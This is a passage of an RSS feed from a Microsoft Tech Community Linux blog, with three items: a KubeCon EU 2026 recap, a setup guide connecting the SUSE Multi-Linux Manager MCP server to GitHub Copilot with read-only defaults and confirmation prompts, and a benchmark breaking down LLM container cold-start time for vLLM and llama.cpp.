&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;KubeCon EU 2026 was a good reminder of why this community continues to grow. The conversations in the Project Pavilion were substantive, the feedback was honest, and the connections made there will carry forward into the work. Microsoft will be back for KubeCon NA in Salt Lake City this November, and we are already looking forward to it.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;If you are interested in getting involved with any of these projects, the best starting point is each project's community directly. You are also welcome to reach out to Lexi Nadolski at &lt;/SPAN&gt;&lt;A href="mailto:lexinadolski@microsoft.com" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;lexinadolski@microsoft.com&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; with any questions.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 28 Apr 2026 12:50:16 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/project-pavilion-presence-at-kubecon-eu-2026/ba-p/4515518</guid>
      <dc:creator>lexinadolski</dc:creator>
      <dc:date>2026-04-28T12:50:16Z</dc:date>
    </item>
    <item>
      <title>Getting Started with the SUSE Multi-Linux Manager MCP Server and GitHub Copilot</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/getting-started-with-the-suse-multi-linux-manager-mcp-server-and/ba-p/4513494</link>
      <description>&lt;P&gt;Enterprise Linux environments are heterogeneous. That's not a problem statement - it's just the truth. SUSE, Ubuntu, RHEL, and their downstream variants coexist in every data center I've seen, and increasingly across Azure subscriptions too.&amp;nbsp; AI assistants like GitHub Copilot can already&amp;nbsp; connect to these machines, run commands, troubleshoot issues, apply patches&amp;nbsp; one box at a time. But if you're managing a fleet of hundreds or thousands&amp;nbsp; of&amp;nbsp; systems across distributions, the gap isn't whether AI can touch your&amp;nbsp; infrastructure. It's whether it can work through the centralized management&amp;nbsp; tooling where your inventory, patch orchestration, RBAC, and audit trails&amp;nbsp; actually live.&lt;/P&gt;
&lt;P&gt;SUSE just took a meaningful step to close that gap. Their Multi-Linux Manager MCP Server, built on the open source Uyuni project gives AI agents like GitHub Copilot a structured, authenticated interface to your existing&amp;nbsp; management platform. Not the individual boxes. The management plane where your centralized inventory, CVE auditing, cross-distribution patch scheduling, and RBAC already live. Not a rip-and-replace. Not a new console to learn. A way to talk to the infrastructure management you've already built.&lt;/P&gt;
&lt;P&gt;This post walks through what the MCP server does, why it matters in an Azure context, and how to get it wired up with GitHub Copilot so you can start working with it today.&lt;/P&gt;
&lt;P&gt;The Model Context Protocol (MCP) is an open standard that defines how AI models connect to external tools and data sources. Think of it as the USB-C of AI integrations - a common interface so that different clients (GitHub Copilot, Claude Desktop, Gemini CLI) can talk to different servers (Azure, SUSE, databases, APIs) without bespoke glue code for every combination.&lt;/P&gt;
&lt;H3&gt;Why This Matters for Azure Customers&lt;/H3&gt;
&lt;P&gt;If you are running Linux workloads on Azure - whether for SAP, HPC, or traditional enterprise applications - the Multi-Linux Manager MCP server provides a conversational interface for your infrastructure without requiring you to change tools.&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-level="1"&gt;Management-plane depth, not just infrastructure inventory. Azure and Copilot already give you fleet-wide visibility into your VMs. The SUSE MCP server adds the layer underneath: patch scheduling state, erratum tracking, cross-distribution CVE audits, and system group management that lives in your Multi-Linux Manager instance.&lt;/LI&gt;
&lt;LI aria-level="1"&gt;A single pane of glass. Pair this with the Azure MCP Server and your AI assistant can move between Azure resource operations and OS-level fleet management in one conversation, across the distributions Multi-Linux Manager supports, without switching tools or contexts.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;What You Can Actually Do With It&lt;/H3&gt;
&lt;P&gt;The MCP server exposes over 20 practical tools for day-to-day infrastructure operations. Instead of relying on a generic knowledge base, Copilot queries your actual infrastructure.&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-level="1"&gt;Inventory and Inspection: You can list active systems across your fleet or pull detailed event histories for specific machines.&lt;/LI&gt;
&lt;LI aria-level="1"&gt;Patch Management and CVE Response: Copilot can rapidly audit all systems for pending updates or identify specific machines vulnerable to a new CVE.&lt;/LI&gt;
&lt;LI aria-level="1"&gt;Operational Actions: You can list system groups, register new systems, or schedule server reboots.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;The Security Model: Human-in-the-Loop&lt;/H3&gt;
&lt;P&gt;Letting an AI agent touch production infrastructure raises the obvious question: what keeps it from doing something destructive? SUSE has been deliberate about this by designing the MCP server with a default "human-in-the-loop" security model.&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-level="1"&gt;Read-Only by Default: The server ships with all write actions disabled (UYUNI_MCP_WRITE_TOOLS_ENABLED=false).&lt;/LI&gt;
&lt;LI aria-level="1"&gt;Explicit Confirmation: If you enable write tools, Copilot is required to ask for your explicit confirmation before executing state-changing actions like applying patches or scheduling reboots.&lt;/LI&gt;
&lt;LI aria-level="1"&gt;Enterprise Authentication: The server supports OAuth 2.0, ensuring the AI agent authenticates through your identity provider.&amp;nbsp;&lt;/LI&gt;
&lt;LI aria-level="1"&gt;Layered Governance: Combined with Multi-Linux Manager’s role-based access control (RBAC) and the principle of least privilege for the service account, you get layered governance without bolting on a separate approval system.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;AI-assisted operations that bypass human judgment won't get adopted in enterprises. AI-assisted operations that make the human faster while keeping them in control, that's the model that actually ships.&lt;/P&gt;
&lt;H3&gt;Architecture on Azure&lt;/H3&gt;
&lt;P&gt;Here's the topology we're working with:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;SUSE Multi-Linux Manager - Running on an Azure VM, managing your Linux fleet across distributions. This is the control plane for your systems - inventory, patching, configuration. Available on Azure Marketplace.&lt;/LI&gt;
&lt;LI&gt;MCP Server - Runs as a container (Docker/Podman), either locally alongside your dev environment or as a standalone HTTP service. The MCP Server container is available in &lt;A href="https://registry.suse.com/repositories/suse-agentic-mcp-multi-linux-manager" target="_blank"&gt;SUSE Registry&lt;/A&gt; and is backed by a secure, trusted software supply chain.&lt;/LI&gt;
&lt;LI&gt;GitHub Copilot - In VS Code or the CLI. Configured to use the MCP server as a tool source. Sends natural language requests, receives structured responses from your infrastructure.&lt;/LI&gt;
&lt;LI&gt;Your Linux fleet on Azure - Whatever Multi-Linux Manager manages for you. The MCP server doesn't care about the distribution mix; that's the whole point of Multi-Linux Manager.&lt;/LI&gt;
&lt;/OL&gt;
&lt;H2&gt;Getting Started: Step by Step&lt;/H2&gt;
&lt;H3&gt;Prerequisites&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; A running SUSE Multi-Linux Manager instance managing your Linux estate&lt;/LI&gt;
&lt;LI&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; Docker or Podman installed on your workstation (for local deployment) or network access to a remote MCP server instance&lt;/LI&gt;
&lt;LI&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; GitHub Copilot with agent mode enabled (VS Code or CLI)&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Step 1: Stand up the MCP Server&lt;/H3&gt;
&lt;P&gt;For local deployment, pull the container and point it at your Multi-Linux Manager instance following the project documentation. For remote/team deployments, your administrator can run the server as a standalone HTTP service with OAuth 2.0.&lt;/P&gt;
&lt;H3&gt;Step 2: Configure GitHub Copilot&lt;/H3&gt;
&lt;P&gt;In VS Code, open the Command Palette and type GitHub Copilot: Configure MCP Servers. Add your server to the config:&lt;/P&gt;
&lt;P&gt;{&lt;BR /&gt;&amp;nbsp; "mcpServers": {&lt;BR /&gt;"suse-multi-linux-manager": {&lt;BR /&gt;&amp;nbsp; "type": "http",&lt;BR /&gt;&amp;nbsp; "url": "https://your-mcp-server.example.com/mcp"&lt;BR /&gt;}&lt;BR /&gt;&amp;nbsp; }&lt;BR /&gt;}&lt;/P&gt;
&lt;H3&gt;Step 3: Verify the Connection&lt;/H3&gt;
&lt;P&gt;Open GitHub Copilot and try a read-only query:&lt;/P&gt;
&lt;P&gt;"List all active systems managed by my SUSE Multi-Linux Manager."&lt;/P&gt;
&lt;P&gt;If your fleet inventory appears, you're connected.&lt;/P&gt;
&lt;H3&gt;Step 4: Start Operating&lt;/H3&gt;
&lt;P&gt;"Are any of my systems affected by CVE-2026-XXXX?"&lt;/P&gt;
&lt;P&gt;"Show me all systems that have pending but unscheduled security patches."&lt;/P&gt;
&lt;P&gt;"Which systems need a reboot?"&lt;/P&gt;
&lt;H2&gt;Getting Involved&lt;/H2&gt;
&lt;P&gt;The SUSE Multi-Linux Manager MCP server is open source under the Apache 2.0 license, built on the Uyuni project. The current v0.5 is a tech preview. Feedback goes to uyuni-project/uyuni#10562, bugs to GitHub Issues.&lt;/P&gt;
&lt;P&gt;The gap in AI-assisted Linux operations was never whether AI could reach your infrastructure. It was whether it could work through the management tooling where your fleet-scale decisions actually get made. SUSE built the bridge to that layer. GitHub Copilot is the conversational interface. Your fleet is already there. Go connect them.&lt;/P&gt;</description>
      <pubDate>Wed, 22 Apr 2026 07:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/getting-started-with-the-suse-multi-linux-manager-mcp-server-and/ba-p/4513494</guid>
      <dc:creator>abbottkarl</dc:creator>
      <dc:date>2026-04-22T07:00:00Z</dc:date>
    </item>
    <item>
      <title>Dissecting LLM Container Cold-Start: Where the Time Actually Goes</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/dissecting-llm-container-cold-start-where-the-time-actually-goes/ba-p/4508831</link>
      <description>&lt;H1&gt;Dissecting LLM Container Cold-Start: Where the Time Actually Goes&lt;/H1&gt;
&lt;P&gt;Cold-start latency determines whether GPU clusters can scale to zero, how fast they can autoscale, and whether bursty or low-QPS workloads are economically viable. Most optimization effort targets the container pull path – faster registries, lazy-pull snapshotters, different compression formats. But “cold-start” is actually a composite of pull, runtime startup, and model initialization, and the dominant phase varies dramatically by inference engine. An optimization that cuts time-to-first-token for one engine can be irrelevant for another, even on identical infrastructure.&lt;/P&gt;
&lt;H2&gt;What we measured&lt;/H2&gt;
&lt;P&gt;We decomposed cold-start for two architecturally different engines – vLLM (Python/CUDA, heavy JIT compilation) and llama.cpp (C++, minimal runtime) – running Llama 3.1 8B on A100 GPUs. Every run starts from a completely clean slate: containerd stopped, all state wiped, kernel page caches dropped. No warm starts, no pre-pulling, no caching.&lt;/P&gt;
&lt;P&gt;We break TTFT into three phases: &lt;STRONG&gt;pull&lt;/STRONG&gt; (download + decompression + snapshot creation), &lt;STRONG&gt;startup&lt;/STRONG&gt; (container start → server ready), and &lt;STRONG&gt;first inference&lt;/STRONG&gt; (first API response, including model weight loading for engines that defer it). We tested across three snapshotters (overlayfs, EROFS, Nydus) with gzip and uncompressed images, pulling from same-region Azure Container Registry.&lt;/P&gt;
&lt;H2&gt;Setup&lt;/H2&gt;
&lt;P&gt;All experiments ran on an NVIDIA A100 80GB (Azure NC24ads_A100_v4), pulling from same-region Azure Container Registry. Images were built with &lt;A href="https://github.com/kaito-project/aikit" target="_blank"&gt;AIKit&lt;/A&gt;, which produces &lt;A href="https://github.com/modelpack/model-spec" target="_blank"&gt;ModelPack&lt;/A&gt;-compliant OCI artifacts with uncompressed model weight layers, Cosign signatures, SBOMs, and provenance attestations. These are supply chain properties you lose when model weights live on a shared drive.&lt;/P&gt;
&lt;H2&gt;vLLM: startup dominates, pull barely matters&lt;/H2&gt;
&lt;P&gt;vLLM loads model weights, runs torch.compile, captures CUDA graphs for multiple batch shapes, allocates KV cache, and warms up, all before serving the first request. This takes ~176 seconds regardless of how fast the image arrived.&lt;/P&gt;
&lt;P&gt;The breakdown makes the bottleneck obvious: the green bar (startup) is nearly constant across all four variants, swamping any pull-time differences.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Figure 1: vLLM cold-start breakdown. Startup (green, ~176s) dominates regardless of snapshotter.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="height: 195px;"&gt;&lt;thead&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;Method&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;Pull&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;Startup&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;1st Inference&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;TTFT&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;overlayfs (gzip)&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;140.8s ±5.5&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;176.0s ±3.2&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;0.16s&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;317.2s ±2.2&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;overlayfs (uncomp.)&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;129.9s ±3.3&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;180.8s ±12.2&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;0.16s&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;310.9s ±8.9&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;EROFS (gzip)&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;158.9s ±8.8&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;175.3s ±0.8&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;0.16s&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;334.4s ±8.7&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;EROFS (uncomp.)&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;166.3s ±21.1&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;177.3s ±12.8&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;0.16s&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;343.8s ±8.2&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;EM&gt;Llama 3.1 8B, ~14 GB image, n=2–3 per variant. ± = sample standard deviation. Three of twelve runs hit intermittent NVIDIA container runtime crashes (exit code 120, unrelated to snapshotters) and were excluded. We excluded Nydus because FUSE-streaming the 14 GB Python/CUDA stack caused startup to exceed 900s. Note: the EROFS uncompressed pull time (166.3s ±21.1) is slower than EROFS gzip, with a standard deviation that swallows the effect — this cell is essentially noise at n=2. Steady-state inference: ~0.134s across all snapshotters.&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;44% pull, 56% startup.&lt;/STRONG&gt; Dropping gzip saves 6 seconds of end-to-end TTFT on a 317-second cold start (&lt;STRONG&gt;1.02x&lt;/STRONG&gt;). If your engine is vLLM, optimizing the pull pipeline is the wrong lever.&lt;/P&gt;
&lt;H2&gt;llama.cpp: pull dominates, compression is the bottleneck&lt;/H2&gt;
&lt;P&gt;llama.cpp has the opposite profile. Its C++ runtime starts in 2–5 seconds, so the pull becomes the majority of cold-start. This is where filesystem and compression choices actually matter.&lt;/P&gt;
&lt;P&gt;Here the picture flips. Pull (blue) is the widest bar, and the gzip-to-uncompressed difference is visible at a glance:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Figure 2: llama.cpp cold-start breakdown. Pull time (blue) dominates for gzip variants.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Method&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pull&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Startup&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;1st Inference&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;TTFT&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;overlayfs (gzip)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;88.3s ±0.2&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;5.3s ±0.5&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;45.1s ±1.4&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;138.8s ±0.8&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;overlayfs (uncomp.)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;56.3s ±3.1&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;2.0s ±0.0&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44.2s ±0.1&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;102.4s ±3.1&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;EROFS (gzip)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;92.0s ±2.3&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;6.1s ±0.5&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44.0s ±0.2&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;142.3s ±1.9&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;EROFS (uncomp.)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;58.8s ±0.6&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;2.0s ±0.0&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44.0s ±0.1&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;104.8s ±0.5&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;EM&gt;Llama 3.1 8B Q4_K_M, 8.7 GB image uncompressed, n=3 per variant, 12/12 runs succeeded. First inference includes model weight loading into GPU VRAM (~43s) plus token generation (~1.5s). Steady-state inference: ~1.5s across all snapshotters.&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;64% pull, 4% startup, 33% model loading.&lt;/STRONG&gt; Dropping gzip saves 36 seconds (&lt;STRONG&gt;1.35x&lt;/STRONG&gt;) with zero infrastructure changes.&lt;/P&gt;
&lt;H2&gt;Engine comparison&lt;/H2&gt;
&lt;P&gt;Placed side by side, the two engines tell opposite stories about the same infrastructure:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Figure 3: Where cold-start time goes. vLLM is compute-bound; llama.cpp is pull-bound.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;vLLM&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;llama.cpp&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Time saved by dropping gzip&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;6s (2% of TTFT)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;36s (26% of TTFT)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Startup time&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;176–181s&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;2–5s&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Speedup from dropping gzip&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;1.02x&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;1.35x&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;Same optimization, completely different impact. Before investing in pull optimization (compression changes, lazy-pull infrastructure, registry tuning), profile your engine’s startup. If startup dominates, the pull isn’t where the time goes.&lt;/P&gt;
&lt;H2&gt;Why gzip hurts: model weights are incompressible&lt;/H2&gt;
&lt;P&gt;The llama.cpp AIKit image is 8.7 GB uncompressed, 6.6 GB with gzip (a modest 0.76x ratio). But this ratio hides what’s really happening:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Layer type&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Size&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;% of image&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Gzip ratio&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Model weights (GGUF)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;4.9 GB&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;56%&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~1.00x (quantized binary, no redundancy)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;CUDA + system layers&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~3.8 GB&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44%&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;~0.46x (compresses well)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;The GGUF file is already quantized to 4-bit precision. Gzip reads every byte, burns CPU, and produces output the same size as the input. You’re paying full decompression cost on 56% of the image for zero size reduction. (For vLLM’s larger 14 GB image, model weights are a smaller fraction and the compressible Python/CUDA stack dominates, which is why gzip’s overhead matters less there.)&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Bottom line:&lt;/STRONG&gt; gzip is doing real work on less than half your image and producing zero savings on the rest. Dropping it costs nothing and removes a bottleneck from every cold start.&lt;/P&gt;
&lt;H2&gt;The Nydus prefetch finding&lt;/H2&gt;
&lt;P&gt;If decompression is the bottleneck, what about skipping the full pull entirely?&lt;/P&gt;
&lt;P&gt;Nydus lazy-pull takes a fundamentally different approach: it fetches only manifest metadata during “pull” (~0.7s), then streams model data on-demand via FUSE as the container reads it. Nydus TTFT isn’t directly comparable to the full-pull methods above because the download cost shifts from the pull column to the inference column.&lt;/P&gt;
&lt;P&gt;With prefetch enabled, Nydus achieved 77.8s TTFT for llama.cpp. The critical detail is the prefetch_all flag — the difference between prefetch ON and OFF is &lt;STRONG&gt;2.87x&lt;/STRONG&gt;:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Figure 4: Nydus prefetch ON vs OFF. One config flag, 2.87x difference. Overlayfs baselines shown for context.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Configuration&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;1st Inference&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;TTFT&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Nydus, prefetch ON&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;72.4s ±0.6&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;77.8s ±0.5&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Nydus, prefetch OFF&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;218.6s ±2.9&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;223.4s ±2.9&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;overlayfs uncompressed (baseline)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44.0s ±0.1&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;102.4s ±3.1&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;overlayfs gzip&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;44.0s ±0.4&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;139.1s ±1.9&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;EM&gt;n=3 per config, 9/9 runs succeeded. Nydus and overlayfs gzip baselines are from a separate test run (&lt;/EM&gt;&lt;A href="https://github.com/robert-cronin/erofs-repro-repo/blob/main/results/03-prefetch-config-20260401-030725.csv" target="_blank"&gt;&lt;EM&gt;03-prefetch-config-20260401-030725.csv&lt;/EM&gt;&lt;/A&gt;&lt;EM&gt;); overlayfs uncompressed is from the main llama.cpp run. The overlayfs gzip baselines are within noise across runs (139.1s vs 138.8s).&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;One flag in nydusd-config.json, &lt;STRONG&gt;2.87x difference&lt;/STRONG&gt; (prefetch ON vs OFF). Without prefetch, every model weight page fault fires an individual HTTP range request to the registry. With prefetch_all=true, Nydus streams the full blob in the background while the container starts, so chunks arrive ahead of the GPU’s read pattern. Note that with prefetch enabled, Nydus is effectively performing a full pull overlapped with container startup rather than true on-demand fetching — the win comes from the overlap, not from fetching less data.&lt;/P&gt;
&lt;P&gt;Compared to overlayfs uncompressed (the post’s recommended baseline), Nydus prefetch is 1.32x faster (77.8s vs 102.4s). Compared to overlayfs gzip, 1.79x.&lt;/P&gt;
